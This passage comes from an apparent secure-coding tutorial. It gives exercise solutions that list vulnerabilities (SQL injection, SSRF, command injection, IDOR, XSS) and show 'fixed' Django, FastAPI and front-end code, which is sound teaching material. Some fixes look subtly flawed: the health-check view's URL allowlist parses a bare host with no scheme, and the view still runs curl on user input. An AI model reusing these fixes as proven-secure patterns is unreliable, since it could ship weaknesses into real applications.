class="n">subprocess</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">cmd_list</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">False</span><span class="p">,</span> <span class="n">capture_output</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">text</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">output</span><span class="sh">'</span><span class="p">:</span> <span class="n">result</span><span class="p">.</span><span class="n">stdout</span><span class="p">})</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">invalid method</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">405</span><span class="p">)</span> <span class="nd">@csrf_protect</span> <span class="nd">@ratelimit</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="sh">'</span><span class="s">ip</span><span class="sh">'</span><span class="p">,</span> <span class="n">rate</span><span class="o">=</span><span class="sh">'</span><span class="s">5/m</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">admin_users</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">token</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">COOKIES</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">report_token</span><span class="sh">'</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">token</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authenticated</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="n">COOKIE_KEY</span><span class="p">,</span> <span class="n">algorithms</span><span class="o">=</span><span class="p">[</span><span class="sh">'</span><span class="s">HS256</span><span class="sh">'</span><span class="p">],</span> <span class="n">issuer</span><span class="o">=</span><span class="sh">"</span><span class="s">issuer_here</span><span class="sh">"</span><span class="p">,</span> <span class="n">audience</span><span class="o">=</span><span class="sh">"</span><span class="s">audience_here</span><span class="sh">"</span><span class="p">)</span> <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authenticated</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="k">if</span> <span class="n">payload</span><span class="p">[</span><span class="sh">'</span><span class="s">role</span><span class="sh">'</span><span class="p">]</span> <span class="o">!=</span> <span class="sh">'</span><span class="s">admin</span><span class="sh">'</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authorized</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">403</span><span class="p">)</span> <span class="n">users</span> <span class="o">=</span> <span class="n">User</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">values</span><span class="p">(</span><span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">username</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">email</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">is_staff</span><span class="sh">'</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">users</span><span class="sh">'</span><span class="p">:</span> <span class="nf">list</span><span class="p">(</span><span class="n">users</span><span class="p">)})</span> </code></pre> </div> <p><strong><code>templates/dashboard.html</code> — Fixed (XSS sink)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- x-html replaced with x-text throughout --&gt;</span> <span class="nt">&lt;div</span> <span class="na">x-text=</span><span class="s">"searchResults"</span><span class="nt">&gt;&lt;/div&gt;</span> </code></pre> </div> <h3> Solution — Exercise 5 </h3> <p><strong>Bugs found:</strong> Hardcoded secret, <code>DEBUG=True</code>, <code>ALLOWED_HOSTS=['*']</code>, SQLi (×2), Path Traversal, OS Command Injection + SSRF in health_check, IDOR (get_invoice + create_api_key), DOM XSS, No Rate Limiting, No TLS</p> <p><strong><code>invoicehub/settings.py</code> — Fixed</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">os</span> <span class="kn">from</span> <span class="n">dotenv</span> <span class="kn">import</span> <span class="n">load_dotenv</span> <span class="nf">load_dotenv</span><span class="p">()</span> <span class="n">SECRET_KEY</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">SECRET_KEY</span><span class="sh">'</span><span class="p">)</span> <span class="n">DEBUG</span> <span class="o">=</span> <span class="bp">False</span> <span class="n">ALLOWED_HOSTS</span> <span class="o">=</span> <span class="p">[</span><span class="sh">'</span><span class="s">first_domain.com</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">second_domain.com</span><span class="sh">'</span><span class="p">]</span> <span class="n">SECURE_SSL_REDIRECT</span> <span class="o">=</span> <span class="bp">True</span> <span class="n">SECURE_HSTS_SECONDS</span> <span class="o">=</span> <span class="mi">31536000</span> <span class="n">SECURE_HSTS_INCLUDE_SUBDOMAINS</span> <span class="o">=</span> <span class="bp">True</span> <span class="n">SECURE_HSTS_PRELOAD</span> <span class="o">=</span> <span class="bp">True</span> </code></pre> </div> <p><strong><code>billing/views.py</code> — Fixed (key excerpts)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">django.http</span> <span class="kn">import</span> <span class="n">JsonResponse</span><span class="p">,</span> <span class="n">FileResponse</span> <span class="kn">from</span> <span class="n">django.contrib.auth.models</span> <span class="kn">import</span> <span class="n">User</span> <span class="kn">from</span> <span class="n">django.db</span> <span class="kn">import</span> <span class="n">connection</span> <span class="kn">from</span> <span class="n">django_ratelimit.decorators</span> <span class="kn">import</span> <span class="n">ratelimit</span> <span class="kn">from</span> <span class="n">django.views.decorators.csrf</span> <span class="kn">import</span> <span class="n">csrf_protect</span> <span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">urlparse</span> <span class="kn">from</span> <span class="n">dotenv</span> <span class="kn">import</span> <span class="n">load_dotenv</span> <span class="kn">import</span> <span class="n">shlex</span><span class="p">,</span> <span class="n">subprocess</span><span class="p">,</span> <span class="n">jwt</span><span class="p">,</span> <span class="n">os</span><span class="p">,</span> <span class="n">requests</span><span class="p">,</span> <span class="n">secrets</span> <span class="nf">load_dotenv</span><span class="p">()</span> <span class="n">COOKIE_KEY</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">COOKIE_KEY</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">is_valid_url</span><span class="p">(</span><span class="n">url</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">allow_list</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">str</span><span class="p">])</span> <span class="o">-&gt;</span> <span class="nb">bool</span><span class="p">:</span> <span class="n">parsed</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> <span class="n">hostname</span> <span class="o">=</span> <span class="n">parsed</span><span class="p">.</span><span class="n">netloc</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="sh">'</span><span class="s">:</span><span class="sh">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="k">return</span> <span class="n">hostname</span> <span class="ow">in</span> <span class="n">allow_list</span> <span class="nd">@csrf_protect</span> <span class="nd">@ratelimit</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="sh">'</span><span class="s">ip</span><span class="sh">'</span><span class="p">,</span> <span class="n">rate</span><span class="o">=</span><span class="sh">'</span><span class="s">5/m</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_invoice</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">invoice_id</span><span class="p">):</span> <span class="n">token</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">COOKIES</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">report_token</span><span class="sh">'</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">token</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authenticated</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="n">COOKIE_KEY</span><span class="p">,</span> <span class="n">algorithms</span><span class="o">=</span><span class="p">[</span><span class="sh">'</span><span class="s">HS256</span><span class="sh">'</span><span class="p">],</span> <span class="n">issuer</span><span class="o">=</span><span class="sh">"</span><span class="s">issuer_here</span><span class="sh">"</span><span class="p">,</span> <span class="n">audience</span><span class="o">=</span><span class="sh">"</span><span class="s">audience_here</span><span class="sh">"</span><span class="p">)</span> <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authenticated</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="n">api_key</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">headers</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">X-API-Key</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">key_obj</span> <span class="o">=</span> <span class="n">APIKey</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">filter</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="n">api_key</span><span class="p">).</span><span class="nf">first</span><span class="p">()</span> <span class="n">owner_id</span> <span class="o">=</span> <span class="n">key_obj</span><span class="p">.</span><span class="n">owner_id</span> <span class="k">if</span> <span class="n">key_obj</span> <span class="k">else</span> <span class="bp">None</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">owner_id</span> <span class="ow">or</span> <span class="n">payload</span><span class="p">[</span><span class="sh">'</span><span class="s">owner_id</span><span class="sh">'</span><span class="p">]</span> <span class="o">!=</span> <span class="n">owner_id</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authorized</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">403</span><span class="p">)</span> <span class="k">with</span> <span class="n">connection</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="k">as</span> <span class="n">cursor</span><span class="p">:</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT id, title, amount, pdf_filename, owner_id FROM billing_invoice WHERE id = %s</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">invoice_id</span><span class="p">,)</span> <span class="p">)</span> <span class="n">row</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">row</span> <span class="ow">or</span> <span class="n">row</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="n">owner_id</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not found</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">404</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">:</span> <span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="sh">'</span><span class="s">title</span><span class="sh">'</span><span class="p">:</span> <span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="sh">'</span><span class="s">amount</span><span class="sh">'</span><span class="p">:</span> <span class="nf">str</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">]),</span> <span class="sh">'</span><span class="s">pdf_filename</span><span class="sh">'</span><span class="p">:</span> <span class="n">row</span><span class="p">[</span><span class="mi">3</span><span class="p">]})</span> <span class="nd">@csrf_protect</span> <span class="nd">@ratelimit</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="sh">'</span><span class="s">ip</span><span class="sh">'</span><span class="p">,</span> <span class="n">rate</span><span class="o">=</span><span class="sh">'</span><span class="s">5/m</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">health_check</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">token</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">COOKIES</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">report_token</span><span class="sh">'</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">token</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authenticated</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="n">COOKIE_KEY</span><span class="p">,</span> <span class="n">algorithms</span><span class="o">=</span><span class="p">[</span><span class="sh">'</span><span class="s">HS256</span><span class="sh">'</span><span class="p">],</span> <span class="n">issuer</span><span class="o">=</span><span class="sh">"</span><span class="s">issuer_here</span><span class="sh">"</span><span class="p">,</span> <span class="n">audience</span><span class="o">=</span><span class="sh">"</span><span class="s">audience_here</span><span class="sh">"</span><span class="p">)</span> <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authenticated</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="k">if</span> <span class="n">payload</span><span class="p">[</span><span class="sh">'</span><span class="s">role</span><span class="sh">'</span><span class="p">]</span> <span class="o">!=</span> <span class="sh">'</span><span class="s">admin</span><span class="sh">'</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authorized</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">403</span><span class="p">)</span> <span class="n">host</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">host</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">localhost</span><span class="sh">'</span><span class="p">)</span> <span class="n">allowlist</span> <span class="o">=</span> <span class="p">[</span><span class="sh">'</span><span class="s">first.com</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">second.com</span><span class="sh">'</span><span class="p">]</span> <span class="k">if</span> <span class="ow">not</span> <span class="nf">is_valid_url</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">allowlist</span><span class="p">):</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authorized</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">403</span><span class="p">)</span> <span class="n">host_sanitize</span> <span class="o">=</span> <span class="n">shlex</span><span class="p">.</span><span class="nf">quote</span><span class="p">(</span><span class="n">host</span><span class="p">)</span> <span class="n">argument</span> <span class="o">=</span> <span class="sh">'</span><span class="s">curl -s --max-time 3 </span><span class="sh">'</span> <span class="o">+</span> <span class="n">host_sanitize</span> <span class="n">cmd_list</span> <span class="o">=</span> <span class="n">shlex</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="n">argument</span><span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">cmd_list</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">False</span><span class="p">,</span> <span class="n">capture_output</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">text</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">status</span><span class="sh">'</span><span class="p">:</span> <span class="n">result</span><span class="p">.</span><span class="n">stdout</span><span class="p">})</span> </code></pre> </div> <p><strong><code>components/InvoiceDashboard.tsx</code> — Fixed</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight tsx"><code><span class="p">{</span><span class="cm">/* DOM XSS fixed — dangerouslySetInnerHTML removed */</span><span class="p">}</span> <span class="p">&lt;</span><span class="nt">div</span><span class="p">&gt;</span><span class="si">{</span><span class="nx">searchHtml</span><span class="si">}</span><span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="kd">const</span> <span class="nx">downloadInvoice</span> <span class="o">=</span> <span class="p">(</span><span class="nx">filename</span><span class="p">:</span> <span class="kr">string</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span> <span class="o">=</span> <span class="s2">`/api/invoices/download/?file=</span><span class="p">${</span><span class="nf">encodeURIComponent</span><span class="p">(</span><span class="nx">filename</span><span class="p">)}</span><span class="s2">`</span><span class="p">;</span> <span class="p">};</span> </code></pre> </div> <h3> Solution — Exercise 6 </h3> <p><strong>Bugs found:</strong> Hardcoded secret, SQLi (×4), IDOR (×2), Path Traversal, OS Command Injection, SSRF (webhook), Missing Auth on all endpoints, XSS via <code>v-html</code>, No Rate Limiting</p> <p><strong><code>app/main.py</code> — Fixed imports</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span><span class="p">,</span> <span class="n">Header</span><span class="p">,</span> <span class="n">UploadFile</span><span class="p">,</span> <span class="n">File</span><span class="p">,</span> <span class="n">Depends</span> <span class="kn">from</span> <span class="n">fastapi.responses</span> <span class="kn">import</span> <span class="n">FileResponse</span><span class="p">,</span> <span class="n">JSONResponse</span> <span class="kn">from</span> <span class="n">fastapi.security</span> <span class="kn">import</span> <span class="n">HTTPBearer</span> <span class="kn">from</span> <span class="n">slowapi</span> <span class="kn">import</span> <span class="n">Limiter</span><span class="p">,</span> <span class="n">_rate_limit_exceeded_handler</span> <span class="kn">from</span> <span class="n">slowapi.util</span> <span class="kn">import</span> <span class="n">get_remote_address</span> <span class="kn">from</span> <span class="n">slowapi.errors</span> <span class="kn">import</span> <span class="n">RateLimitExceeded</span> <span class="kn">from</span> <span class="n">starlette_csrf</span> <span class="kn">import</span> <span class="n">CSRFMiddleware</span> <span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">urlparse</span> <span class="kn">from</span> <span class="n">dotenv</span> <span class="kn">import</span> <span class="n">load_dotenv</span> <span class="kn">from</span> <span class="n">passlib.hash</span> <span class="kn">import</span> <span class="n">argon2</span> <span class="kn">import</span> <span class="n">subprocess</span><span class="p">,</span> <span class="n">httpx</span><span class="p">,</span> <span class="n">shlex</span><span class="p">,</span> <span class="n">jwt</span><span class="p">,</span> <span class="n">os</span><span class="p">,</span> <span class="n">sqlite3</span><span class="p">,</span> <span class="n">secrets</span> </code></pre> </div> <p><strong>Key fixed views (excerpts)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/workspaces/{workspace_id}/notify</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@limiter.limit</span><span class="p">(</span><span class="sh">"</span><span class="s">5/minute</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">notify_workspace</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="n">workspace_id</span><span class="p">:</span> <span class="nb">int</span><span class="p">,</span> <span class="n">payload</span><span class="p">:</span> <span class="nb">dict</span><span class="p">,</span> <span class="n">db</span><span class="p">:</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Connection</span> <span class="o">=</span> <span class="nc">Depends</span><span class="p">(</span><span class="n">get_db</span><span class="p">)):</span> <span class="n">token</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">cookies</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">session</span><span class="sh">'</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">token</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JSONResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authenticated</span><span class="sh">'</span><span class="p">},</span> <span class="n">status_code</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">jwt_payload</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="n">SECRET_KEY</span><span class="p">,</span> <span class="n">algorithms</span><span class="o">=</span><span class="p">[</span><span class="sh">'</span><span class="s">HS256</span><span class="sh">'</span><span class="p">])</span> <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JSONResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">invalid token</span><span class="sh">'</span><span class="p">},</span> <span class="n">status_code</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">db</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT webhook_url, owner_id FROM workspaces WHERE id = :workspace_id</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">workspace_id</span><span class="sh">"</span><span class="p">:</span> <span class="n">workspace_id</span><span class="p">})</span> <span class="n">row</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">row</span> <span class="ow">or</span> <span class="n">jwt_payload</span><span class="p">[</span><span class="sh">'</span><span class="s">owner_id</span><span class="sh">'</span><span class="p">]</span> <span class="o">!=</span> <span class="nf">int</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">]):</span> <span class="k">return</span> <span class="nc">JSONResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authorized</span><span class="sh">'</span><span class="p">},</span> <span class="n">status_code</span><span class="o">=</span><span class="mi">403</span><span class="p">)</span> <span class="n">webhook_url</span> <span class="o">=</span> <span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="n">allowlist_domains</span> <span class="o">=</span> <span class="p">[</span><span class="sh">'</span><span class="s">first.com</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">second.com</span><span class="sh">'</span><span class="p">]</span> <span class="k">if</span> <span class="ow">not</span> <span class="nf">is_valid_url</span><span class="p">(</span><span class="n">webhook_url</span><span class="p">,</span> <span class="n">allowlist_domains</span><span class="p">):</span> <span class="k">return</span> <span class="nc">JSONResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authorized</span><span class="sh">'</span><span class="p">},</span> <span class="n">status_code</span><span class="o">=</span><span class="mi">403</span><span class="p">)</span> <span class="k">async</span> <span class="k">with</span> <span class="n">httpx</span><span class="p">.</span><span class="nc">AsyncClient</span><span class="p">()</span> <span class="k">as</span> <span class="n">client</span><span class="p">:</span> <span class="k">await</span> <span class="n">client</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="n">webhook_url</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="n">payload</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">notified</span><span class="sh">"</span><span class="p">}</span> </code></pre> </div> <p><strong><code>pages/documents.vue</code> — Fixed</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight vue"><code><span class="c">&lt;!-- v-html replaced with v-text throughout --&gt;</span> <span class="nt">&lt;div</span> <span class="na">v-text=</span><span class="s">"searchResults"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;div</span> <span class="na">v-text=</span><span class="s">"doc.content"</span><span class="nt">&gt;&lt;/div&gt;</span> </code></pre> </div> <h3> Solution — Exercise 7 </h3> <p><strong>Bugs found:</strong> Hardcoded secret, <code>DEBUG=True</code>, <code>ALLOWED_HOSTS=['*']</code>, Missing CSRF + Clickjacking middleware, No TLS, SQLi (×2), IDOR (×2), Path Traversal (×2), OS Command Injection, SSRF, Missing Auth on all endpoints, XSS via <code>[innerHTML]</code> + <code>bypassSecurityTrustHtml</code>, No Rate Limiting, Missing AuditLog calls</p> <p><strong><code>portal/models.py</code> — Fixed (Profile + authorization matrix)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">django.db</span> <span class="kn">import</span> <span class="n">models</span> <span class="kn">from</span> <span class="n">django.contrib.auth.models</span> <span class="kn">import</span> <span class="n">User</span> <span class="kn">from</span> <span class="n">django.db.models.signals</span> <span class="kn">import</span> <span class="n">post_save</span> <span class="kn">from</span> <span class="n">django.dispatch</span> <span class="kn">import</span> <span class="n">receiver</span> <span class="k">class</span> <span class="nc">Profile</span><span class="p">(</span><span class="n">models</span><span class="p">.</span><span class="n">Model</span><span class="p">):</span> <span class="sh">"""</span><span class="s"> Role-based access control for MedPortal. Authorization matrix: ┌─────────────┬──────────────────────────────────────────────────────────┐ │ Role │ Permissions │ ├─────────────┼──────────────────────────────────────────────────────────┤ │ staff │ - Upload lab results │ │ │ - Search patients by name │ │ │ - View patient basic info (name, DOB) │ │ │ - Cannot view diagnosis │ │ │ - Cannot download lab results │ │ │ - Cannot run exports │ │ │ - Cannot fetch external guidelines │ ├─────────────┼──────────────────────────────────────────────────────────┤ │ doctor │ - All staff permissions │ │ │ - View full patient record including diagnosis │ │ │ - Download lab results for assigned patients only │ │ │ - Fetch external clinical guidelines │ │ │ - Cannot run report exports │ │ │ - Cannot access other doctors</span><span class="sh">'</span><span class="s"> patients │ ├─────────────┼──────────────────────────────────────────────────────────┤ │ admin │ - Full access to all endpoints │ │ │ - Run report exports │ │ │ - View all patients regardless of assigned doctor │ │ │ - View all lab results │ │ │ - Cannot be assigned as a doctor to a patient │ └─────────────┴──────────────────────────────────────────────────────────┘ </span><span class="sh">"""</span> <span class="k">class</span> <span class="nc">Role</span><span class="p">(</span><span class="n">models</span><span class="p">.</span><span class="n">TextChoices</span><span class="p">):</span> <span class="n">STAFF</span> <span class="o">=</span> <span class="sh">'</span><span class="s">staff</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">Staff</span><span class="sh">'</span> <span class="n">DOCTOR</span> <span class="o">=</span> <span class="sh">'</span><span class="s">doctor</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">Doctor</span><span class="sh">'</span> <span class="n">ADMIN</span> <span class="o">=</span> <span class="sh">'</span><span class="s">admin</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">Admin</span><span 